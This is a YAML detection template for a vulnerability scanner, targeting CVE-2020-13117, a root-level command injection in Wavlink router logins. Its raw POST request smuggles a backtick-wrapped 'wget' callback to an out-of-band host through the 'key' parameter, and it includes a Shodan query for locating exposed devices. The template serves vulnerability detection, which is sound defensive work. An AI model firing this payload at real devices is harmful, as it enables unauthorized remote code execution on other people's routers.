id: CVE-2020-13117

info:
  name: Wavlink Multiple AP - Remote Command Injection
  author: gy741
  severity: critical
  description: Wavlink products are affected by a vulnerability that may allow remote unauthenticated users to execute arbitrary commands as root on Wavlink devices. The user input is not properly sanitized which allows command injection via the "key" parameter in a login request. It has been tested on Wavlink WN575A4 and WN579X3 devices, but other products may also be affected.
  reference:
    - https://blog.0xlabs.com/2021/02/wavlink-rce-CVE-2020-13117.html
    - https://nvd.nist.gov/vuln/detail/CVE-2020-13117
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2020-13117
    cwe-id: CWE-77
  metadata:
    verified: true
    shodan-query: http.title:"Wi-Fi APP Login"
  tags: cve,cve2020,wavlink,rce,oast,router

requests:
  - raw:
      - |
        POST /cgi-bin/login.cgi HTTP/1.1
        Host: {{Hostname}}
        Origin: http://{{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Accept-Encoding: gzip, deflate

        newUI=1&page=login&username=admin&langChange=0&ipaddr=192.168.1.66&login_page=login.shtml&homepage=main.shtml&sysinitpage=sysinit.shtml&hostname=wifi.wavlink.com&key=%27%3B%60wget+http%3A%2F%2F{{interactsh-url}}%3B%60%3B%23&password=asd&lang_select=en

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol # Confirms the HTTP Interaction
        words:
          - "http"

      - type: word
        part: body
        words:
          - "parent.location.replace"

      - type: status
        status:
          - 200

# Enhanced by mp on 2022/05/16